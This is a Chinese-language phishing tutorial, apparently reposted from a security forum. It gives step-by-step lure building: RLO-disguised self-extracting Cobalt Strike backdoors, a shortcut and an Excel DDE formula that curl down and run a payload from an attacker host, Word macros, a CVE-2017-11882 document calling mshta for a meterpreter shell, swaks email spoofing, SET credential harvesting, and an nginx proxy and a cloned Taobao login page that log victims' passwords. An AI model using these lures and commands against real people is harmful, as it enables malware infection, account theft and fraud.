钓鱼网站 潇湘信安“设为星标”，否则可能看不到了！

请不要利用文章中的相关技术从事非法测试。 由此产生的任何不良后果与文章作者及本公众号无关。

目前大图推送仅针对常读、加星的公众号显示。 建议大家“把潇湘新安定为明星”，不然可能看不到！

1. 什么是网络钓鱼？

网络钓鱼是一种冒充银行或其他信誉良好的机构向他人发送垃圾邮件的攻击方法，目的是引诱收件人泄露用户名、密码、帐户 ID、ATM PIN 或信用卡等敏感信息细节。

2. 网络钓鱼的基本流程

钓鱼一般分为三个步骤：找大鱼、做饵、抛竿

3、如何制作优质鱼饵

0x01.自解压+RLO

制作思路：利用自解压文件的特性，解压后自动执行解压后的文件，达到上线的目的。 由于自解压文件的后缀是exe，很容易被识破，所以我们还需要利用RLO后缀反转来进行一些伪装。

第一步：使用cs生成后门

第二步：准备一张随机图片，用图片使用后门自解压。

压缩文件时，需要在高级-自解压选项中进行一些设置，使木马的执行更加隐蔽：

常规——解压路径：C:windowstemp设置——解压后运行：C:windowstempartifact.exeC:windowstemp壁纸.jpg
模式——全部隐藏更新——更新模式——解压并更新文件更新——覆盖模式——覆盖所有文件

步骤3：使用替换文件图标将其伪装成图片

第四步：将文件重命名为 gpj.exe，然后使用RLO反转后缀。 最终效果如下

结合电子邮件钓鱼等方式向他人发送“图片”，引诱他人上钩。 对方双击“图片”后，.exe和.jpg会同时执行，cs上线。

0x02.快捷方式

制作思路：运行快捷方式时，执行命令让它下载我们提前放置在服务器上的后门程序并运行

第一步：在cs中生成后门并放到服务器网站目录下

步骤2：创建快捷方式并在目标中写入以下代码

C:WindowsSystem32cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:Windowstempwin.exe && C:Windowstempwin.exe

步骤 3：更改图标以增加其真实性

当对方双击快捷键时，我们准备好的.exe就会被下载并执行。

0x03.Word宏病毒

宏病毒是嵌入在Word 中的带有恶意行为的宏代码（VBA 代码）。 当我们双击打开含有宏病毒的word文档时，其宏代码就会自动运行。

第一步：使用cs生成恶意vba代码

步骤2：新建一个doc文档，创建宏，并保存

第三步：再次打开文件后，会提示是否启用宏。 点击启用，cs就上线了。

0x04.Excel注入

Excel注入是一种将包含恶意命令的Excel公式插入到可以导出为csv或xls等格式的文本中的方法。 当在excel中打开xls文件时，该文件会被转换为excel格式，并提供excel公式的执行功能，从而导致命令被执行。

使用excel注入弹出计算器

注入代码：=cmd| '/c 计算'！ '!A1'

使用excel注入在线cs

第一步：使用cs生成exe后门并放到服务器上

第二步：替换恶意代码

=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:Windowstempwin.exe && C:Windowstempwin.exe' ! 'A1'

当excel双击打开时，就会执行恶意代码，下载cs后门并运行，cs就会上线。

0x05.CVE-2017-11882

CVE-2017-11882漏洞也是一种文字钓鱼方式。 它比宏病毒更加隐蔽。 Word伪装成某个通知文件，目标点击后可以直接上网。

使用CVE-2017-11882弹出计算器：

下载poc：

生成带病毒的word文件

python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

双击test.doc钓鱼网站，弹出计算器

使用cve-2017-11882上线msf

步骤1：使用//misc/生成病毒

use exploit/windows/misc/hta_serverset payload windows/meterpreter/reverse_httpset lport 4444show optionsexploit

第二步：生成含有病毒的doc文件，并将其伪装成通知文件

python2 Command109b_CVE-2017-11882.py -c "mshta http://192.168.126.132:8080/Uf7DGFz.hta" -o 通知文件.doc -i input.rtf

当受害者打开word时，msf将启动一个shell

4. 电子邮件伪造

斯瓦克斯

Swaks是kali自带的一个电子邮件伪造工具。 通过 swak，您可以将包含任何内容的电子邮件发送到任何目标。

swaks的用法： --from <发件人的邮箱>  --ehlo <伪造邮件头>  --body <邮件正文内容>  --header <邮件头信息，subject为邮件标题>  --data <源邮件>  --attach <附件文件>

发送电子邮件至指定的电子邮件地址

swaks --to seyoulala@chacuo.net --from A公司 --ehlo 中奖通知 --body 秉承“正德厚生，臻于至善”的企业核心价值观，立足发展，真情回馈社会和客户。全体员工祝贺您在此活动中获得一等奖。再次感谢您对本公司的关信和支持，本信仅为中奖凭证，具体细节见注意事项。--header "Subject: 中奖通知"

如今，邮箱具有某种检测机制。 如果你想让别人发邮件，这个方法就不是很有效。

它是一个开源的钓鱼工具包，拥有自己的网页面板，给电子邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来了极大的便利。

伪造获奖通知电子邮件并发送附件

效果看起来不错，如果能对文件进行免杀就更好了

第二种方法是将克隆的网站插入电子邮件正文中。

然后克隆一个QQ邮箱的登录页面，诱导其输入账号密码。

如果对方提交并输入账号密码，会显示在

5. 网站克隆

0x01、

说到克隆网站，Kali内置的克隆网站为我们提供了很大的便利。 它不仅可以记录用户提交的数据，还可以进行注入攻击。

克隆网站

1.开始，选择器1，社会工程攻击

1) Social-Engineering Attacks【社工攻击(常用)】2) Penetration Testing (Fast-Track)【渗透测试（快速的）】3) Third Party Modules【第三方模块】4) Update the Social-Engineer Toolkit【更新社工工具包】5) Update SET configuration【升级配置】6) Help, Credits, and About【帮助】

2.然后选择2、web网站攻击-钓鱼

1) Spear-Phishing Attack Vectors【鱼叉式网络钓鱼攻击】2) Website Attack Vectors【web网站式攻击-钓鱼(常用)】3) Infectious Media Generator【传染性木马】4) Create a Payload and Listener【创建payload和监听器】5) Mass Mailer Attack【邮件群发攻击】6) Arduino-Based Attack Vector【基于安卓的攻击】7) Wireless Access Point Attack Vector【wifi攻击】8) QRCode Generator Attack Vector【生成二维码(就普通二维码)】9) Powershell Attack Vectors【Powershell攻击】10) Third Party Modules【第三方模块】

3.选项3，凭证攻击

1) Java Applet Attack Method【java小程序攻击】2) Metasploit Browser Exploit Method【Metasploit浏览器利用】3) Credential Harvester Attack Method【凭证攻击(常用)】4) Tabnabbing Attack Method【Tabnabbing攻击】5) Web Jacking Attack Method【web劫持】6) Multi-Attack Web Method【web多重攻击】7) HTA Attack Method【HTA攻击】

4.最后选择2、网站克隆

1) Web Templates【web模板】2) Site Cloner【克隆网站】3) Custom Import【自定义导入】

5. 保留默认IP地址即可，最后输入您要克隆的站点。

6.访问攻击者IP即可看到克隆的站点

当用户输入账户密码时，会被记录

HTA注入攻击

首先使用克隆站点。 当用户点击运行脚本时，会触发shell反弹。

1、启动并选择1、社会工程攻击

2、然后选择2、web网站攻击-网络钓鱼

3.然后选择7、HTA攻击

4.选择2，克隆网站

5. 进入克隆站点并设置默认监听IP和端口。 最后，您需要选择攻击负载 TCP。

当攻击者访问攻击机器的IP时，会弹出弹窗并在线启动shell。

0x02、nginx反向代理克隆镜像网站

nginx具有反向代理功能，将客户端请求均匀分发到多个后端业务服务器进行处理，nginx将执行结果返回给客户端，解决网站流量过大的问题。

使用nginx反向代理克隆生成镜像网站，就是通过反向代理将请求分发到不属于我们的网站进行处理，最后通过nginx将处理结果返回给用户。

1、打开nginx配置文件，在http处添加如下配置，并指定日志的存储内容。

log_format Clonelog escape=json '{$remote_addr|'    '$request_filename|'    '$request_body|'    '$http_cookie|'    '$http_x_forwarded_for|'    '$time_local}';

2、在/www//panel/vhost/nginx/目录下添加clone.conf并进行如下配置，生成镜像网站

server{
    listen 8000;    server_name 127.0.0.1;    index index.html index.htm index.php;    access_log /www/wwwlogs/access.log Clonelog;
 location / {    proxy_pass http://xxx.xxx.com;    proxy_buffering off;    proxy_set_header X-Real-Ip $remote_addr;    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;    proxy_set_header Host "xxx.xxx.com";    proxy_set_header Accept-Encoding "";    proxy_set_header User-Agent $http_user_agent;    proxy_set_header referer "http://xxx.xxx.com$request_uri";    }}

关键点就是$（获取post数据），$（获取数据），这就是我们钓鱼的核心。 当有人访问并登录我们的反向代理网站时，我们可以点击日志，看到他提交的用户名和密码以及帖子。

3、重新加载nginx配置文件，nginx -s

4.访问克隆网站并查看效果。

4. 如果用户提交了账户密码，则会记录在日志文件中。 日志文件位置为：/www//.log

0x03、前端页面克隆

首先找一个大的网站，一个有登录界面的，用ctrl+s保存网站的前端代码，然后稍微修改一下后端功能，这样我们的钓鱼网站的界面就几乎可以看起来很假了。

瞄准某宝的官网

使用ctrl+s保存网站前端代码

但在网站目录中访问时，会出现一些偏差，密码框会被拉长。

经过一番调试，我需要删除密码框前面标签中的id属性，然后再次访问就没有问题了。

现在两个接口除了URL之外基本是一样的。 使用F12查找form标签中原网站账号密码的name值。

账号的name值：logonId密码的name值：password_rsainput

将表单内容提交到check.php。 为了保证真实性，让用户弹出“该账户不存在或登录密码错误或已达到上限，请更换账户”的提示。 第一次输入账号密码后，再次跳转。 到真实的网址。

但如果只修改这部分就会有一个问题，就是只能收到账号，而收不到密码。

经查，需要修改密码的name值。 无法使用网页的原始值。 这里修改一下，保证不会重复。

Check.php也需要修改

尝试再次登录钓鱼网站

成功收到用户输入的账户密码

但查看用户名和密码不太方便。 写一个show.php用于显示。

为了使网站看起来更真实，您还可以购买域名并进行一些伪装。

文章来源：先知社区（obse****）原文地址：https://xz.aliyun.com/t/12682

Tags：钓鱼 克隆 邮件 解压 双击